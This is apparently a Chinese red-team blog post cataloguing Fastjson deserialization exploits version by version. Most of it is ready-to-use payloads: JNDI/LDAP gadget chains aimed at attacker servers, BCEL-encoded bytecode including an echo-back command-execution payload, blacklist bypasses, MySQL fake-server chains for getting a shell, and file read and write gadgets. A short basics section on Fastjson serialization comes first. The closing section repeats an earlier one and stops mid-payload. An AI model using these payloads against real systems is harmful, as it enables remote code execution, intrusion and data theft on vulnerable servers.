Fastjson总结
2023-5-11 15:1:50 Author: 红队蓝军(查看原文) 阅读量:86 收藏

前言

  • fastjson<=1.2.24

    • com.sun.rowset.JdbcRowSetImpl利用链

    • c3p0#JndiRefForwardingDataSource

    • shiro#JndiObjectFactory

    • shiro#JndiRealmFactory

    • BCEL利用

  • 1.2.33<=fastjson<=1.2.36

  • 1.2.25<=fastjson<=1.2.41

  • fastjson=1.2.42

  • fastjson=1.2.43

  • fastjson<=1.2.45

  • fastjson<=1.2.47

  • fastjson<= 1.2.62漏洞

  • fastjson<=1.2.66漏洞

  • fastjson = 1.2.68

    • mysql-connector-java 5.1.X利用链

    • mysql-connector-java 6.0.2-6.0.3 利用链

    • mysql-connector-java 8.0.19利用链

    • 文件读取

    • 写入文件

  • fastjson=1.2.24

  • 1.2.33<=fastjson<=1.2.36

  • 1.2.36<=fastjson<=1.2.47

  • c3p0#WrapperConnectionPoolDataSource

Fastjson基础

新建一个Fastjson项目,写入一个javaBean。idea中右键Generate自行创建Getter and Setter和有参无参方法。

Fjson.java,调用了解Fastjson基础使用

package com.ni.fastjsonstudy.demos.web.bean;

import com.alibaba.fastjson.JSON;
import com.alibaba.fastjson.JSONObject;
import com.alibaba.fastjson.serializer.SerializerFeature;

class Store {
    private String name;
    private Fruit fruit;
    private Apple apple;
}

interface Fruit {
}

class Apple implements Fruit {
    private int price;
}

public class AboutAutoType {
    public static void main(String[] args) {
        Store store = new Store();
        store.setName("store");
        
        Apple apple = new Apple();
        apple.setPrice(10);
        store.setFruit(apple);
        String s = JSON.toJSONString(store);
        System.out.println("toJSONString: "+s);
        String s2 = JSON.toJSONString(store, SerializerFeature.WriteClassName);
        System.out.println("toJSONString(sw): "+s2);

    }
}

序列化过程中,JSON.toJSONString()是否添加第二个SerializerFeature.WriteClassName,将对应决定字符中是否携带@type:class.name。当添加后,输出的序列化值将携带,值如下:

 String s2 = JSON.toJSONString(store, SerializerFeature.WriteClassName);
System.out.println("toJSONString(sw): "+s2);
//{"@type":"com.ni.fastjsonstudy.demos.web.bean.Store","fruit":{"@type":"com.ni.fastjsonstudy.demos.web.bean.Apple","price":10},"name":"store"}

反序列化过程中,JSON.parse会输出对象类名。使用JSON.parseObject则是获取到的JSONobject类,仅在携参数Object.class时,输出的仍为User类名。因此从格式输出上JSON.parse类似于JSON.parseObject(,Object.class)

//jsonString={"@type":"com.ni.fastjsonstudy.demos.web.bean.Store","fruit":{"@type":"com.ni.fastjsonstudy.demos.web.bean.Apple","price":10},"name":"store"}
JSONObject newStore1 = JSON.parseObject(jsonString);
System.out.println("parseObject: " + newStore1);
System.out.println(newStore1.getClass().getName());
//parseObject: {"fruit":{"price":10},"name":"store"}
//com.alibaba.fastjson.JSONObject
Store newStore2 = JSON.parseObject(jsonString={"@type":"com.ni.fastjsonstudy.demos.web.bean.Store","fruit":{"@type":"com.ni.fastjsonstudy.demos.web.bean.Apple","price":10},"name":"store"}, Store.class);
System.out.println("parseObject(,Store.class) : " + newStore2);
System.out.println(newStore2.getClass().getName());
//parseObject(,Store.class) : Store{name='store', fruit=Apple{price=10}, apple=null}
//com.ni.fastjsonstudy.demos.web.bean.Store
//s={"fruit":{"price":10},"name":"store"}
Object newStore3 = JSON.parse(s);
System.out.println("parse: " + newStore3);
System.out.println(newStore3.getClass().getName());
//parse: {"fruit":{"price":10},"name":"store"}
//com.alibaba.fastjson.JSONObject
//{"fruit":{"price":10},"name":"store"}
Object newStore4 = JSON.parseObject(s,Store.class);
System.out.println("parse: " + newStore4);
System.out.println(newStore4.getClass().getName());
//parse: Store{name='store', fruit={}, apple=null}
//com.ni.fastjsonstudy.demos.web.bean.Store

fastjson关于安全上的疑问,很大一部分原因在于AutoType@type存在于字符串的意义就是当一个类包含一个接口(或是抽象类时),序列化过程中会抹去这个子类的详细内容,只保留接口(抽象类)的类型,使得反序列化时无法获取原始类型。如上例子中就能很好的发现这个问题。

因此有了autotype的功能,fastjson反序列化过程中会将@type的值反序列化为一个对象,并且会调用该类的setter方法。如果@type的值为攻击者指定的恶意类库,则能实现反序列化攻击。

下面罗列下fastjson每个版本漏洞,并简要分析

PS:

  • LADP利用JDK版本≤ 6u211 、7u201、8u191
  • RMI利用的JDK版本≤ JDK 6u132、7u122、8u113

fastjson<=1.2.24

com.sun.rowset.JdbcRowSetImpl利用链

Payload

{
  "rand1": {
    "@type""com.sun.rowset.JdbcRowSetImpl",
    "dataSourceName""ldap://localhost:1389/Object",
    "autoCommit"true
  }
}

复现步骤

利用工具起一个LDAP端口,工具原理是从ip端口下的1389中访问获取到恶意类,进一步触发反序列化攻击。

环境为idea下的tomcat,故选择工具中匹配环境的payload放入关键点。

c3p0#JndiRefForwardingDataSource

利用条件

<dependency>
    <groupId>com.mchange</groupId>
    <artifactId>c3p0</artifactId>
    <version>0.9.5.2</version>
</dependency>

Payload

{
    "@type""com.mchange.v2.c3p0.JndiRefForwardingDataSource",
    "jndiName""rmi://127.0.0.1:1099/badClassName",
    "loginTimeout"0
}

shiro#JndiObjectFactory

利用条件

有shiro就能打

<dependency>
    <groupId>org.apache.shiro</groupId>
    <artifactId>shiro-core</artifactId>
    <version>1.11.0</version>
</dependency>

Payload

{
    "@type""org.apache.shiro.jndi.JndiObjectFactory",
    "resourceName""rmi://127.0.0.1:9050/exploit"
}

shiro#JndiRealmFactory

todo

{
    "@type""org.apache.shiro.realm.jndi.JndiRealmFactory",
    "jndiNames""rmi://127.0.0.1:9050/exploit"
}

BCEL利用

可用于解决不出网限制

利用条件

  1. fastjson 1.2.24
  2. tomcat7使用的类是org.apache.tomcat.dbcp.dbcp.BasicDataSource,而在8版本以后名为org.apache.tomcat.dbcp.dbcp2.BasicDataSource
<dependency>
    <groupId>org.apache.tomcat</groupId>
    <artifactId>tomcat-dbcp</artifactId>
    <version>9.0.8</version>
</dependency>

Payloads

1、自定义poc

编写恶意java代码

package com.ni.fastjsonstudy.demos.web;
import java.io.IOException;
public class Bcel {
    static {
        try {
            Runtime.getRuntime().exec("calc");
        } catch (IOException e) {
            e.printStackTrace();
        }
    }
}

转换为字节码并编码为bcel字节码

public static void main(String[] args) throws IOException {
        JavaClass cls = Repository.lookupClass(Bcel.class);
        System.out.println(cls.getBytes());
        String code = Utility.encode(cls.getBytes(), true);//转换为字节码并编码为bcel字节码
        System.out.println(code);
        String poc = "{\n" +
                "    {\n" +
                "        \"aaa\": {\n" +
                "                \"@type\": \"org.apache.tomcat.dbcp.dbcp2.BasicDataSource\",\n" +
                "                \"driverClassLoader\": {\n" +
                "                    \"@type\": \"com.sun.org.apache.bcel.internal.util.ClassLoader\"\n" +
                "                },\n" +
                "                \"driverClassName\": \"$$BCEL$$"+ code+ "\"\n" +
                "        }\n" +
                "    }: \"bbb\"\n" +
                "}";
        System.out.println(poc);
        JSON.parse(poc);
    }

上文代码中poc如下:

{
    {
        "aaa": {
                "@type""org.apache.tomcat.dbcp.dbcp2.BasicDataSource",
                "driverClassLoader": {
                    "@type""com.sun.org.apache.bcel.internal.util.ClassLoader"
                },
                "driverClassName""$$BCEL$$$l$8b$I$A$A$A$A$A$A$A$8dQMO$db$40$Q$7d$9b8$b1$e3$3a$N$84$86$96$7eB$81$S8$b0$Xn$m$O$ad$8aT$d5$z$a8A$f4$bc$d9l$c3$a6$8e7$b27$U$7e$Rg$$$808$f0$D$f8Q$88$f1$96R$qz$a8W$9e$d9$f9xo$de$d8W$d7$X$97$A$d6$f0$$D$80$a7$n$9ea$s$c0$f3$c2$bf$f0$f12D$F$af$7c$bc$f6$f1$86$a1$ba$a1Sm7$Z$ca$ed$e5$3d$G$ef$83$e9$v$86F$acS$f5u$3c$ec$aalWt$T$ca4c$pE$b2$t2$5d$c4$b7I$cf$ee$eb$9ca1$96f$c8S$cd$7f$88$dc$Or$93$e6v$dc$3b$e2$3d549$ff$a5$ba$fc$bdT$c9$3aC$b0$n$93$dbi$8c$d0$adx$m$O$E$d7$86$7f$da$fex$u$d5$c8j$93R$5b$bdc$85$fc$f9E$8c$dc$U$S$cc$Qv$cc8$93jK$XSk$F$ddj$81$8dPC$e8c6$c2$i$de$92$iR$u$p$ccc$81a$ea$l$dc$R$W$R2$cc$ff$87Z$86$JG$90$88$b4$cf$b7$bb$D$r$z$c3$e4$df$d4$b7qj$f5$90$c4$84$7de$ef$82V$7b9$7e$d0C$hy$eaPI$86$a5$f6$bdj$c7f$3a$ed$af$df$H$ecdF$aa$3c$t$40cDE$eb$be$c3n$s$a4$a2$fd$7c$fa$95$c5S$C$x$b6$s$fb$88$oN$9e$91$af$ac$9c$81$9d$b8rD$b6$ea$92$n$ead$a3$df$Nx$8c$G$f9$A$Tw$60$e1$c8$80$e69J$cd$f2$v$bc$ef$c7$I$3e$af$9c$a2z$e2$f25$c2VPv$8c$d3t$D$f1$d5$I$l$RW$9d$d8$s$e9$fc$99P$87GQ$93$a2$vz$7d$94b$lO$3c$w$b4$9c$a8$e9$h$fd$g$91$e0$94$C$A$A"
        }
    }: "bbb"
}

2、命令执行可回显poc

POST /json HTTP/1.1
cmd:whoami

{
    {
        "@type""com.alibaba.fastjson.JSONObject",
        "x":{
                "@type""org.apache.tomcat.dbcp.dbcp2.BasicDataSource",
                "driverClassLoader": {
                    "@type""com.sun.org.apache.bcel.internal.util.ClassLoader"
                },
                "driverClassName""$$BCEL$$$l$8b$I$A$A$A$A$A$A$A$8dV$cb$5b$TW$U$ff$5dH27$c3$m$g$40$Z$d1$wX5$a0$q$7d$d8V$81Zi$c4b$F$b4F$a5$f8j$t$c3$85$MLf$e2$cc$E$b1$ef$f7$c3$be$ec$a6$df$d7u$X$ae$ddD$bf$f6$d3$af$eb$$$ba$ea$b6$ab$ae$ba$ea$7fP$7bnf$C$89$d0$afeq$ee$bd$e7$fe$ce$ebw$ce$9d$f0$cb$df$3f$3e$Ap$I$df$aaHbX$c5$IF$a5x$9e$e3$a8$8a$Xp$8ccL$c1$8b$w$U$e4$U$iW1$8e$T$i$_qLp$9c$e4x$99$e3$94$bc$9b$e4$98$e2$98VpZ$o$cep$bc$c2qVE$k$e7Tt$e2$3c$c7$F$b9$cep$bc$ca1$cbqQ$G$bb$c4qY$c1$V$VW$f1$9a$U$af$ab0PP$b1$h$s$c7$9c$5c$85$U$f3$i$L$iE$F$96$82E$86$c4$a8$e5X$c1Q$86$d6$f4$c0$F$86X$ce$9d$T$M$j$93$96$p$a6$x$a5$82$f0$ce$Z$F$9b4$7c$d4$b4$pd$7b$3e0$cc$a5$v$a3$5c$bb$a2j$U$yQ$z$94$ac$C$9b$fc2$a8y$b7$e2$99$e2$84$r$z$3b$f2e$cfr$W$c6$cd$a2$9bY4$96$N$N$H1$a4$a0$a4$c1$81$ab$a1$8ck$M$a3$ae$b7$90$f1k$b8y$cf$u$89$eb$ae$b7$94$b9$$$K$Z$d3u$C$b1$Sd$3cq$ad$o$fc$ms6$5cs$a1z$c2$b5$e7$84$a7$c0$d3$e0$p$60$e8Z$QA$84$Y$L$C$cf$wT$C$e1S$G2l$d66$9c$85l$ce6$7c_C$F$cb$M$9b$d7$d4$a7$L$8b$c2$M$a8$O$N$d7$b1$c2p$ec$ff$e6$93$X$de$b2$bda$d0$b6Z$$$7e$d9u$7c$oA$5d$cb$8ca$a7$M$bc$92$f1C$db5$lup$92$c03$9e$V$I$aa$eb$86$ccto$b3A1$I$ca$99$J$S$cd$d1C$c3$Ja$Q$tM$d5$e5$DY$88$867$f0$s$f5$d9$y$cd1$u$ae$9fq$a80$Foix$h$efhx$X$ef$d1$e5$cc$c9i$N$ef$e3$D$86$96$acI$b0l$c1r$b2$7e$91$8eC$a6$86$P$f1$R$e9$q$z$81$ed0l$a9$85$a8$E$96$9d$cd$9b$86$e3$c8V$7c$ac$e1$T$7c$aa$e13$7c$ae$e0$a6$86$_$f0$a5l$f8W$e4$e1$f2$98$86$af$f1$8d$86$5b2T$7c$de$aeH$c7q$d3ve$d1$9dk$f9$8e$af$98$a2$iX$$$85$e85$ddRv$de$f0$83E$dfu$b2$cb$V$8a$b4$3aM$M$3dk6$9e$98$b7$a9$85$d9$v$R$U$5d$w$b0$f3$d2$e4$a3$E$8c4$91r$ae$e8$RS4$cdf$c5$f3$84$T$d4$cf$5d$e9$81$c9GQd$d9M$d4FSW$9b$a1I7$a4Yo$827$5cI$9b$N$_$a8M6mj$gjmz$7d$9e$eb$3c$8e$84$ad$ad$d7vl$D$9bK$ebl$g$bd4$b3C$ee$S$96$b3$ec$$$R$edG$g$7d$85$cf$a0$c9W$a4$gX$af$a2$feSN$c7$85i$h$9e$98$ab$e7$d6$ee$8b$60$cc4$85$ef$5b$b5$efF$y$7dQ$7eW$g$a7$f1$86$l$88R$f8$40$cexnYx$c1$N$86$7d$ff$c1$c3j$L$db$C$f7$7c$99$8cr$86$9c$9a$e6n$ad$82$b8$7c$a7$86$e5$Q$c1$bd$8d$8esE$c3$cb$cb$d7$e2$98bd$e0$o$Be$5b$c3Nt$ae$ef$e4H$7d$c6k$aa$b3$V$t$b0J$f5$c7$5c$3ft7$99Ej2$8c$89$VA$_$u$9d$de$60$Q$h$z$88$C$c9Vs$a8H$c9$b0$89B$9dt$ca$95$80$y$85A$acm$ab$87$b3$dcl$c3$F$99$f7$a47$bc$90$eck$V_$i$X$b6U$92$df$U$86$fd$ff$ceu$e3c$96E84$ef$e8$c3$B$fa$7d$91$7f$z$60$f2$ebM2C$a7$9d$b42Z$e3$83w$c1$ee$d0$86$nK2QS$s$c0$f1D$j$da$d2O$O$da$Ip$f5$kZ$aahM$c5$aa$88$9f$gL$rZ$efC$a9$82O$k$60$b4KV$a1NE$80$b6$Q$a0$d5$B$83$a9$f6h$3b$7d$e0$60$84$j$8e$N$adn$e3$91$dd$s$b2Ku$84$d0$cd$c3$89H$bbEjS1$d2$ce$b6$a6$3a$f3$f2J$d1$VJ$a2KO$84R$8f$d5$3dq$5d$d1$e3$EM$S$b4$9b$a0$ea$cf$e8$iN$s$ee$93TS$5b$efa$5b$V$3d$v$bd$8a$ed$df$p$a5$ab$S$a3$ab$b1To$fe6$3a$e4qG$ed$b8$93d$5cO$e6u$5e$c5c$a9$5d$8d$91u$k$3a$ff$J$bbg$ef$a1OW$ab$e8$afb$cf$5d$3c$9e$da$5b$c5$be$w$f6$cb$a03$a1e$3a$aaD$e7Qz$91$7e$60$9d$fe6b$a7$eeH$e6$d9$y$bb$8cAj$95$ec$85$83$5e$92IhP$b1$8d$3a$d0G$bb$n$b4$e306$n$87$OLc3f$b1$F$$R$b8I$ffR$dcB$X$beC7$7e$c0VP$a9x$80$k$fc$K$j$bfa$3b$7e$c7$O$fcAM$ff$T$bb$f0$Xv$b3$B$f4$b11$f4$b3Y$ec$a5$88$7b$d8$V$ec$c7$93$U$edY$c4$k$S$b8M$c1S$K$9eVp$a8$$$c3M$b8$7fF$n$i$da$k$c2$93s$a3$e099$3d$87k$pv$e4$l$3eQL$40E$J$A$A"
        }
    }: "x"
}

1.2.33<=fastjson<=1.2.36

{
    "name":
    {
        "@type" : "java.lang.Class",
        "val"   : "org.apache.tomcat.dbcp.dbcp2.BasicDataSource"
    },
    "x" : {
        "name": {
            "@type" : "java.lang.Class",
            "val"   : "com.sun.org.apache.bcel.internal.util.ClassLoader"
        },
        {
            "@type":"com.alibaba.fastjson.JSONObject",
            "c": {
                "@type":"org.apache.tomcat.dbcp.dbcp2.BasicDataSource",
                "driverClassLoader": {
                    "@type" : "com.sun.org.apache.bcel.internal.util.ClassLoader"
                },
                "driverClassName":"$$BCEL..."
            }
        } : "ddd"
    }
}

1.2.25<=fastjson<=1.2.41

fastjson默认关闭了autotype支持,并且加入了checkAutotype,加入了黑名单来防御autotype开启的情况。

1.2.25后将TypeUtils.loadClass替换为checkAutoType()函数,增加了黑名单和白名单。autoTypeSupport默认为False,利用条件为True。当开启后,才能触发加载类。

开启了autoTypeSupport,先白名单,再黑名单

未开启autoTypeSupport,依然会进行黑白名单检测,先黑名单,再白名单。

Fastjson为了兼容一些特殊类,会将开头为L[,末尾为;的类进行去除处理。如Lcom.lang.Thread;也能被匹配到。

故绕过方式一目了然。

复现时需加上ParserConfig.getGlobalInstance().setAutoTypeSupport(true);

Payload

{
  "rand1": {
    "@type""Lcom.sun.rowset.JdbcRowSetImpl;",
    "dataSourceName""ldap://172.16.7.124:1389/TomcatBypass/Command/calc",
    "autoCommit"true
  }

fastjson=1.2.42

1.2.42中对黑名单类进行了hash计算,通过十进制来比较是否匹配。

同时多了一步,率先判断传入类的首尾字符是否为L;,是则去除首尾字符进行后进行匹配。

故绕过方式为双写绕过:

{
  "rand1": {
    "@type""LLcom.sun.rowset.JdbcRowSetImpl;;",
    "dataSourceName""ldap://172.16.7.124:1389/TomcatBypass/Command/calc",
    "autoCommit"true
  }

fastjson=1.2.43

在1.2.42的基础上多了个if判断。在第一次首位匹配到L;后,再判断类名首尾前两个字符是否为LL;;

此时双写绕过已经失效,可以采用[绕过。

{
    "a": {
        "@type""[com.sun.rowset.JdbcRowSetImpl"[{,
                "dataSourceName""ldap://192.168.31.239:1389/TomcatBypass/TomcatEcho",
                "autoCommit"true
         }
}

fastjson<=1.2.45

简要分析

使用黑名单绕过,org.apache.ibatis.datasource在1.2.46版本中被加入了黑名单

Payload

{"@type":"org.apache.ibatis.datasource.jndi.JndiDataSourceFactory","properties":{"data_source":"ldap://47.99.70.18:9999/Exploit"}}

fastjson<=1.2.47

利用条件

当autoType关闭时可触发,与1.2.25那个区间的触发条件正好相反。

  • 1.2.25-1.2.32版本:未开启AutoTypeSupport时能成功利用,开启AutoTypeSupport不能利用
  • 1.2.33-1.2.47版本:无论是否开启AutoTypeSupport,都能成功利用

简要分析

fastjson中存在全局缓存的机制,当autoType关闭时,会优先从缓冲中获取类。通过java.lang.Class这个非黑名单的类,而其对应的deserializer为MiscCodec,反序列化时会将json中的val值缓存进fastjson(默认fastjson cache为true)。但这还没解释为什么autoType关闭时才能触发。这里稍微看一下CheckAutoType的流程:

public Class<?> checkAutoType(String typeName, Class<?> expectClass, int features) {
   //autoType 开启时判断白名单、黑名单
        if (autoTypeSupport || expectClass != null) {
        }
  ...
       // 此处的代码调用有已经加载到了java.lang.Class及val对应的恶意类
        if (clazz != null) {
            if (expectClass != null
                    && clazz != java.util.HashMap.class
                    && !expectClass.isAssignableFrom(clazz)) 
{
                throw new JSONException("type not match. " + typeName + " -> " + expectClass.getName());
            }

            return clazz;
        }
  // autoType 关闭时判断黑白名单
        if (!autoTypeSupport) {
            
        }
        ...
        return clazz;
    }

payload将恶意类先于黑白名单检测加载进了fastjson,来绕过安全限制。

Payload

{
    "a":{
        "@type":"java.lang.Class",
        "val":"com.sun.rowset.JdbcRowSetImpl"
    },
    "b":{
        "@type":"com.sun.rowset.JdbcRowSetImpl",
        "dataSourceName":"ldap://localhost:1389/badNameClass",
        "autoCommit":true
    }
}

fastjson<= 1.2.62漏洞

黑名单绕过

Payload

{"@type":"org.apache.xbean.propertyeditor.JndiConverter","asText":"ldap://localhost:43658/Calc"}
{
    "@type""com.ibatis.sqlmap.engine.transaction.jta.JtaTransactionConfig",
    "properties": {
        "@type""java.util.Properties",
        "UserTransaction""ldap://localhost:43658/Calc"
    }
}
{
    "@type""org.apache.cocoon.components.slide.impl.JMSContentInterceptor",
    "parameters": {
        "@type""java.util.Hashtable",
        "java.naming.factory.initial""com.sun.jndi.rmi.registry.RegistryContextFactory",
        "topic-factory""ldap://127.0.0.1:43658/Calc"
    },
    "namespace"""
}
{
    "@type""br.com.anteros.dbcp.AnterosDBCPConfig",
    "healthCheckRegistry""ldap://localhost:43658/Calc"
}

fastjson<=1.2.66漏洞

利用条件

基于黑名单绕过。autoTypeSupport属性为true才能使用。(fastjson >= 1.2.25默认为false)

Payloads

{"@type":"org.apache.shiro.jndi.JndiObjectFactory","resourceName":"ldap://xxxx:xxx/Calc"}
{"@type":"br.com.anteros.dbcp.AnterosDBCPConfig","metricRegistry":"ldap://xxxx:xxx/Calc"}
{"@type":"org.apache.ignite.cache.jta.jndi.CacheJndiTmLookup","jndiNames":"ldap://xxxx:xxx/Calc"}
{"@type":"com.ibatis.sqlmap.engine.transaction.jta.JtaTransactionConfig","properties"
{"@type":"java.util.Properties","UserTransaction":"ldap://xxxx:xxx/Calc"}}
{"@type":"org.apache.shiro.realm.jndi.JndiRealmFactory""jndiNames":["ldap://localhost:43658/Calc"], "Realms":[""]}
{"@type":"org.apache.hadoop.shaded.com.zaxxer.hikari.HikariConfig","metricRegistry":"ldap://localhost:43658/Calc"}

fastjson = 1.2.68

mysql-connector-java 5.1.X利用链

SSRF

利用条件:mysql-connector-java 5.1.X

{
    "a": {
        "@type""java.lang.AutoCloseable",
        "@type""com.mysql.jdbc.JDBC4Connection",
        "hostToConnectTo""3l7rni.ceye.io"//dns url
        "portToConnectTo"3306,
        "info": {
            "user""user",
            "password""pass",
            "statementInterceptors""com.mysql.jdbc.interceptors.ServerStatusDiffInterceptor",
            "autoDeserialize""true",
            "NUM_HOSTS""1"
        },
        "databaseToConnectTo""dbname",
        "url"""
    }
}

mysql-connector-java 5.0.2-5.1.5 反序列化

{
   "@type":"java.lang.AutoCloseable",
   "@type":"com.mysql.jdbc.ReplicationConnection",
   "masterProperties":{
          "HOST":"127.0.0.1"//mysql ip
          "user":"yso_CommonsCollections4_calc"//payload
          "password":"pass",
          "statementInterceptors":"com.mysql.jdbc.interceptors.ServerStatusDiffInterceptor",
          "autoDeserialize":"true"
   },
   "slaveProperties":{
          "HOST":"127.0.0.1"//mysql ip
          "user":"yso_CommonsCollections4_calc"//payload
          "password":"pass",
          "statementInterceptors":"com.mysql.jdbc.interceptors.ServerStatusDiffInterceptor",
          "autoDes erialize":"true"
   }
}

mysql-connector-java 5.1.11-5.1.48 反序列化

{
    "a": {
        "@type""java.lang.AutoCloseable",
        "@type""com.mysql.jdbc.JDBC4Connection",
        "hostToConnectTo""172.16.7.124"//mysql ip
        "portToConnectTo"3307//mysql port
        "info": {
            "user""cc5",
            "password""pass",
            "statementInterceptors""com.mysql.jdbc.interceptors.ServerStatusDiffInterceptor",
            "autoDeserialize""true",
            "NUM_HOSTS""1"
        },
        "databaseToConnectTo""dbname",
        "url"""
    }
}

实战利用

用到工具

bp扫描器扫到fastjson,dnslog请求成功payload如下,为fastjson1.2.68 jdbc链。注:dns探测成功不代表可反序列化利用

{
    "x": {
        "@type""java.lang.AutoCloseable",
        "@type""com.mysql.jdbc.JDBC4Connection",
        "hostToConnectTo""t5jqzh4buvhl3tb.bwu3um.dnslog.cn",
        "portToConnectTo"80,
        "info": {
            "user""root",
            "password""ubuntu",
            "useSSL""false",
            "statementInterceptors""com.mysql.jdbc.interceptors.ServerStatusDiffInterceptor",
            "autoDeserialize""true"
        },
        "databaseToConnectTo""mysql",
        "url"""
    }
}

使用MySQL_Fake_Server生成一个恶意mysql服务,使用方式详见链接。

此处使用的是更改config.json的参数内容来构造payload。

启动

hostToConnectTo填入VPS地址,user填入cc5(不更改config.json的话则为yso_CommonsCollections5_语句,长语句建议用前者配置)。

getshell

mysql-connector-java 6.0.2-6.0.3 利用链

dns探测

{
    "a": {
        "@type""java.lang.AutoCloseable",
        "@type""com.mysql.cj.jdbc.ha.LoadBalancedMySQLConnection",
        "proxy": {
            "connectionString": {
                "url""jdbc:mysql://3l7rni.ceye.io:3306/foo?allowLoadLocalInfile=true"
            }
        }
    }
}

反序列化

{
    "name": {
        "@type""java.lang.AutoCloseable",
        "@type""com.mysql.cj.jdbc.ha.LoadBalancedMySQLConnection",
        "proxy": {
            "connectionString": {
                "url""jdbc:mysql://172.16.7.124:3307/test?autoDeserialize=true&statementInterceptors=com.mysql.cj.jdbc.interceptors.ServerStatusDiffInterceptor&useSSL=false&user=yso_CommonsCollections5_calc" //mysql ip:port user=payload
            }
        }
    }
}

mysql-connector-java 8.0.19利用链

SSRF

{
    "a": {
        "@type""java.lang.AutoCloseable",
        "@type""com.mysql.cj.jdbc.ha.ReplicationMySQLConnection",
        "proxy": {
            "@type""com.mysql.cj.jdbc.ha.LoadBalancedConnectionProxy",
            "connectionUrl": {
                "@type""com.mysql.cj.conf.url.ReplicationConnectionUrl",
                "masters": [
                    {
                        "host""3l7rni.ceye.io"
                    }
                ],
                "slaves": [],
                "properties": {
                    "host""3l7rni.ceye.io",
                    "user""user",
                    "dbname""dbname",
                    "password""pass",
                    "queryInterceptors""com.mysql.cj.jdbc.interceptors.ServerStatusDiffInterceptor",
                    "autoDeserialize""true"
                }
            }
        }
    }
}

https://mp.weixin.qq.com/s/BRBcRtsg2PDGeSCbHKc0fg

反序列化

RCE,复现时需要server端需要启用的是默认3306端口,payload中无法定义接口

{"a":{
    "@type":"java.lang.AutoCloseable",
    "@type""com.mysql.cj.jdbc.ha.ReplicationMySQLConnection",
    "proxy":
    {
        "@type""com.mysql.cj.jdbc.ha.LoadBalancedConnectionProxy",
        "connectionUrl":
        {
            "@type""com.mysql.cj.conf.url.ReplicationConnectionUrl",
            "masters":
            [
                {
                    "host""172.16.7.124" //mysql ip
                }
            ],
            "slaves":
            [],
            "properties":
            {
                "host""172.16.7.124",  //mysql ip
                "user""cc5",  //payload
                "dbname""dbname",
                "password""pass",
                "queryInterceptors""com.mysql.cj.jdbc.interceptors.ServerStatusDiffInterceptor",
                "autoDeserialize""true"
            }
        }
    }
}}

文件读取

当bytes的值等于url值文件的首字母时,则读取成功,数组中的字符可以累加。略鸡肋

{
    "abc": {
        "@type""java.lang.AutoCloseable",
        "@type""org.apache.commons.io.input.BOMInputStream",
        "delegate": {
            "@type""org.apache.commons.io.input.ReaderInputStream",
            "reader": {
                "@type""jdk.nashorn.api.scripting.URLReader",
                "url""file:///D:/1.txt"
            },
            "charsetName""UTF-8",
            "bufferSize"1024
        },
        "boms": [{
            "charsetName""UTF-8",
            "bytes": [49]
        }]
    },
    "address": {
        "$ref""$.abc.BOM"
    }
}

写入文件

{
  "x":{
    "@type":"com.alibaba.fastjson.JSONObject",
    "input":{
      "@type":"java.lang.AutoCloseable",
      "@type":"org.apache.commons.io.input.ReaderInputStream",
      "reader":{
        "@type":"org.apache.commons.io.input.CharSequenceReader",
        "charSequence":{"@type":"java.lang.String""xxxxx(写入字符长度需>8192,写入文件可覆盖可新建)"
      },
      "charsetName":"UTF-8",
      "bufferSize":1024
    },
    "branch":{
      "@type":"java.lang.AutoCloseable",
      "@type":"org.apache.commons.io.output.WriterOutputStream",
      "writer":{
        "@type":"org.apache.commons.io.output.FileWriterWithEncoding",
        "file":"D://1.txt",  //写入路径
        "encoding":"UTF-8",
        "append"false
      },
      "charsetName":"UTF-8",
      "bufferSize"1024,
      "writeImmediately"true
    },
    "trigger":{
      "@type":"java.lang.AutoCloseable",
      "@type":"org.apache.commons.io.input.XmlStreamReader",
      "is":{
        "@type":"org.apache.commons.io.input.TeeInputStream",
        "input":{
          "$ref":"$.input"
        },
        "branch":{
          "$ref":"$.branch"
        },
        "closeBranch"true
      },
      "httpContentType":"text/xml",
      "lenient":false,
      "defaultEncoding":"UTF-8"
    },
    "trigger2":{
      "@type":"java.lang.AutoCloseable",
      "@type":"org.apache.commons.io.input.XmlStreamReader",
      "is":{
        "@type":"org.apache.commons.io.input.TeeInputStream",
        "input":{
          "$ref":"$.input"
        },
        "branch":{
          "$ref":"$.branch"
        },
        "closeBranch"true
      },
      "httpContentType":"text/xml",
      "lenient":false,
      "defaultEncoding":"UTF-8"
    },
    "trigger3":{
      "@type":"java.lang.AutoCloseable",
      "@type":"org.apache.commons.io.input.XmlStreamReader",
      "is":{
        "@type":"org.apache.commons.io.input.TeeInputStream",
        "input":{
          "$ref":"$.input"
        },
        "branch":{
          "$ref":"$.branch"
        },
        "closeBranch"true
      },
      "httpContentType":"text/xml",
      "lenient":false,
      "defaultEncoding":"UTF-8"
    }
  }
}

利用Tomcat 加载bcel字节码可用来解决不出网问题。

Q&A:不出网如何发现是否存在fastjson漏洞呢?有dns出网和tcp出网,此处的不出网为tcp不出网。

fastjson=1.2.24

利用条件

  1. fastjson 1.2.24
  2. tomcat7使用的类是org.apache.tomcat.dbcp.dbcp.BasicDataSource,而在8版本以后名为org.apache.tomcat.dbcp.dbcp2.BasicDataSource
<dependency>
    <groupId>org.apache.tomcat</groupId>
    <artifactId>tomcat-dbcp</artifactId>
    <version>9.0.8</version>
</dependency>

Payloads

1、自定义poc

编写恶意java代码

package com.ni.fastjsonstudy.demos.web;
import java.io.IOException;
public class Bcel {
    static {
        try {
            Runtime.getRuntime().exec("calc");
        } catch (IOException e) {
            e.printStackTrace();
        }
    }
}

转换为字节码并编码为bcel字节码

public static void main(String[] args) throws IOException {
        JavaClass cls = Repository.lookupClass(Bcel.class);
        System.out.println(cls.getBytes());
        String code = Utility.encode(cls.getBytes(), true);//转换为字节码并编码为bcel字节码
        System.out.println(code);
        String poc = "{\n" +
                "    {\n" +
                "        \"aaa\": {\n" +
                "                \"@type\": \"org.apache.tomcat.dbcp.dbcp2.BasicDataSource\",\n" +
                "                \"driverClassLoader\": {\n" +
                "                    \"@type\": \"com.sun.org.apache.bcel.internal.util.ClassLoader\"\n" +
                "                },\n" +
                "                \"driverClassName\": \"$$BCEL$$"+ code+ "\"\n" +
                "        }\n" +
                "    }: \"bbb\"\n" +
                "}";
        System.out.println(poc);
        JSON.parse(poc);
    }

上文代码中poc如下:

{
    {
        "aaa": {
                "@type""org.apache.tomcat.dbcp.dbcp2.BasicDataSource",
                "driverClassLoader": {
                    "@type""com.sun.org.apache.bcel.internal.util.ClassLoader"
                },
